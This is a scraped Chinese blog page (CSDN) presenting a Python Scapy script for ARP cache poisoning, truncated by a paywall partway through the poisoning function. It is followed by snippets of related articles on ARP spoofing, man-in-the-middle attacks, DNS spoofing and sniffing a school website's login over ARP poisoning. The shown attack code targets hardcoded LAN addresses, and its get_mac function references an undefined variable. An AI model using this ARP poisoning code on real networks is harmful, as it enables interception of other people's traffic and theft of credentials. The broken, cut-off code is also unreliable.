python黑帽子:利用scapy进行arp缓存投毒

最新推荐文章于 2024-05-03 16:56:13 发布
最新推荐文章于 2024-05-03 16:56:13 发布
阅读量3k 收藏 2
点赞数 1
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38619030/article/details/76736460
版权
本文探讨了如何使用Python的Scapy库进行ARP缓存中毒攻击。通过理解ARP协议的工作原理,学习如何利用Scapy发送欺骗ARP包,控制网络流量并解释可能的安全风险。
摘要由CSDN通过智能技术生成 

from scapy.all import *
import os
import sys
import threading
import  signal

#interface = 'en1'
target_ip = '192.168.43.141'
gateway_ip = '192.168.43.1'
packet_count = 1000

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
	print("[*] restoring target......")
	send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
	send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
	
	os.kill(os.getpid(),signal.SIGINT)

def get_mac(ip_address):
	srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address),timeout=2,retry=10)
	for s,r in responses:
		return(r[Ether].src)
	return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
	poison_target = ARP()
	poison_target.op = 2
	poison_target.psrc =
最低0.47元/天 解锁文章
samohyes
关注
专栏目录
Python ARP缓存投毒ARP欺骗)
墨痕诉清风的博客
07-12 1465
ARP投毒的逻辑:欺骗目标设备,使其相信我们是它的网关;网络上的每一台设备,都维护着一段ARP缓存,里面记录着最近一段时间本地网络上的MAC地址和IP地址的对应关系。为了实现这一攻击,我们会往这些ARP缓存投毒,即在缓存中插入我们编造的记录。此时在目标机器上查看网关,可见目标机器的ARP缓存已经被投毒了,其中的网关(192.168.153.2)的MAC地址其实是攻击者的,同时也可以看到攻击者是192.168.153.141,因为它的MAC地址和网关的毒MAC地址是一样的。查看ARP缓存中的网络邻居地址。
安全学习篇:ARP缓存中毒攻击
城南以南花亦开
07-24 7461
个人博客主页:https://www.boolo.top 【本文博客同步地址】 了解ARP的基础知识,逐步讲解ARP缓存中毒攻击的原理,并进行相应的攻击演示。 一、ARP基础知识 1. ARP简介 ARP即地址解析协议(Address Resolution Protocol)的简称,该协议是TCP/IP协议簇里面的一个协议。ARP的主要作用是根据IP
python实现dns欺骗_Python帽子ARP 缓存投毒与DNS欺骗
weixin_39646695的博客
12-15 255
#coding=utf-8importosimportsysimportsubprocessfrom scapy.all import *RSN= 48 #管理帧信息元素(Dot11Elt)ID48是RSN信息WPA = 221 #管理帧信息元素ID221是WPA信息Dot11i = {0:'GroupCipher',1:'WEP-40',2:'TKIP',4:'CCMP',5:'WEP...
基于ARP缓存投毒获取教务处网站密码
a1889199124975的博客
06-25 272
本文章仅供交流学习使用,本文章实验用的主机也已经经由当事人授权,请勿用于其它用途,否则后果自负。 (真不想罗嗦这一句):-) 第一次写技术性博客,肯定会有一些问题,大家将就着看吧>_<   周五晚上在图书馆讨论事情的的时候发现:教务处网站的网站使用http协议,post表单是明文传送的。截取表单后发现一个类似IPT_LOGINUSERNAME=×××××××××(×代表...
Python中的Scapy初探之三-ARP中毒
txyj08的专栏
08-28 593
原文地址:Python中的Scapy初探之三-ARP中毒作者:小牛牛 这个工具太强大,搞一个ARP缓存中毒竟然这么简单,关于ARP缓存中毒,可以百度。通过ARP缓存中毒,可以将目标计算机的IP地址与MAC地址对应关系替换成另外一台机器的MAC地址,这样,在链路层中,就会将发送到某个IP的数据发送到指定的机器上,例如,发送到192.168.1.1的数据,在ARP缓存中,找到192.168.
Python利用scapy实现ARP欺骗的方法
01-20
使用scapyscapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether(src=src_mac, dst=dst_mac)#赋值src_mac时需要注意,参数为字符串类型 arp = ARP(hwsrc=src_mac,...
python arp请求_Python Scapyarp请求和响应
weixin_39679468的博客
12-22 441
Scapy's user manual建议使用sr()或sr1()函数发送数据包和接收答案:The sr() function is for sending packets and receiving answers. The function returns a couple of packet and answers, and the unanswered packets. The funct...
最新利用 Python 开发包 Scapy 实现 ARP 欺骗_python实现ip欺骗检测
最新发布
2301_82242474的博客
05-03 540
书籍的好处就在于权威和体系健全,刚开始学习的时候你可以只看视频或者听某个人讲课,但等你学完之后,你觉得你掌握了,这时候建议还是得去看一下书籍,看权威技术书籍也是每个程序员必经之路。Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。成为一个Python程序员专家或许需要花费数年时间,但是打下坚实的基础只要几周就可以,如果你按照我提供的学习路线以及资料有意识地去实践,你就有很大可能成功!
Python教程:使用scapy模块实现一个网络抓包小工具(附完整源码)
复现的博客
03-25 3384
Scapy 是一个强大的 Python 第三方库,用于处理网络数据包,包括抓取、解析、构造和发送各种类型的网络数据包。本文利用scapy模块设计开发一个网络抓包小工具。
scapy-MITM:使用Scapy进行ARP毒化的小型python脚本,并使用iptables进行IPTM重定向以进行MITM攻击。 用于https
05-02
替补 使用Scapy的小型python脚本使用Linux内置的Iptables进行ARP中毒和IP地址重定向,以执行MITM攻击。 目前,它的测试很有限,这意味着当心它不起作用。 另外,这会弄乱您的Iptable配置的规则,因此,如果您关心这种事情,请格外小心。 仅用于教育目的。 作者对此软件的任何使用概不负责,在您不拥有的网络上使用此软件很可能是非法的。 干杯,麦克斯韦。 让我知道是否有任何损坏或发布到此的问题。 用法 由于TCP是串行协议,因此管理点对点消息的完成时间或双方完成通信的时间取决于要传递的消息类型。 我已经在tcp_MITM.py中定义了DATA_MESSAGE_END和DATA_TRANSMIT_END,但是您很可能需要进行调整,以便tcp连接在需要时关闭。 去做 清理代码 使用KeyboadInterrupt优雅地终止线程 将tcp_MITM的启动调整为包括手动模式,该
内网ARP投毒攻击.PDF
06-21
该文档为ARP投毒攻击的原理步骤以及防御对策的概括性总结
python之最简单实现arp攻击
05-30
原来我实现的时候都写了一大堆,今天想到了最简单实现的方法,分享给大家
【SEED Lab】ARP Cache Poisoning Attack Lab
qq_43599063的博客
07-10 1701
一共有三台机器,我们使用Host M进行攻击,因为ARP协议只在局域网上运行,所以三台机器在同一个局域网上面。实验目的:在主机 M 上,构造一个 ARP 请求包,发送给主机 A。查看主机 A 的 ARP 缓存中 M 的 MAC 地址是否映射到 B 的 IP 地址。 1.首先要进入hostA和主机M,因为ARP协议只能在局域网内才有用。 2.查看主机A里面的ARP缓存看是否已经缓存了B,如果有就要删除。 3.编写代码。 4.运行并查看结果,主要代码要在主机M里面运行。 在主机 M 上,构造一个 ARP
ARP缓冲投毒
iteye_16188的博客
11-19 855
原因: 由于ARP被设置为简单有效,但是缺乏认证,所以它的实现没有认证部分,没有办法忍认证IP和MAC地址的映射关系。 后果: 1. DOS 2. MITM 3. MAC泛洪 对于网络中的交换机,MAC地址泛洪是由于使用了ARP缓存投毒技术。对于许多的网络交换机,当交换机超负荷运行时,他们开始降级为hub,并且在网络中广播所有流量。所以攻击者可以通过伪造ARP应答来泛洪一个交换机...
任务一  ARP缓存中毒
红蓝联盟的博客
07-24 3983
实验二  TCP/IP协议攻击 任务一  ARP缓存中毒 1.1 工作原理 ARP缓存ARP协议的重要组成部分。一旦MAC地址和IP地址之间的映射被解析为执行ARP协议的结果,映射将被缓存。因此,如果映射已经在缓存中,则不需要重复ARP协议。然而,由于ARP协议是无状态的,所以高速缓存可能会被恶意制作的ARP消息中毒(篡改)。这种攻击称为ARP缓存中毒攻击。在这种攻击中,攻击者使用欺骗AR...
ARP投毒攻击
weixin_30642267的博客
11-14 217
原理:通过分别伪装成客户机和服务器IP,将自己的MAC地址绑定在IP上,ARP错误的将IP解析为中间人MAC地址,从而来欺骗服务器网关和客户机,使信息必须通过客户机。 转载于:https://www.cnblogs.com/nul1/p/9958333.html...
python第二版(Black Hat Python 2nd Edition)读书笔记 之 第四章 使用SCAPY掌控网络(2)Scapy实现ARP缓存投毒
阿尔泰野狼的博客
10-08 526
本文主要记录了博主在阅读Black Hat Python 2nd Edition过程中的心得以及踩坑经历。
电脑安全 ARP缓存感染攻击解析
yes_angel的博客
06-23 742
对人们撒谎,即所谓的“社会工程”,还包含了策略(已获罪的客Kevin Mitnick有具体实施),例如假扮成一个公司的雇员这样就可以和真正的雇员交换公司机密。要骗过计算机则包括许多不同的技术,一个常用的是——ARP缓存中毒(ARP Cache Poisoning)——这是本文的核心。ARP中毒能让局域网内的客在其网内造成巨大的网络破坏。由于它通常是“不可治愈”的,因此每一个网络管理员都应该
SEEDLab网络嗅探与欺骗实验报告:利用Scapy进行Sniffing和Spoofing
"该资源是一份关于网络安全的实验报告,...这份实验报告是学习网络安全和Scapy库的宝贵资料,它提供了理论知识和实践经验的结合,有助于深入理解网络嗅探和欺骗的概念,并掌握使用Scapy进行网络分析和安全测试的技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值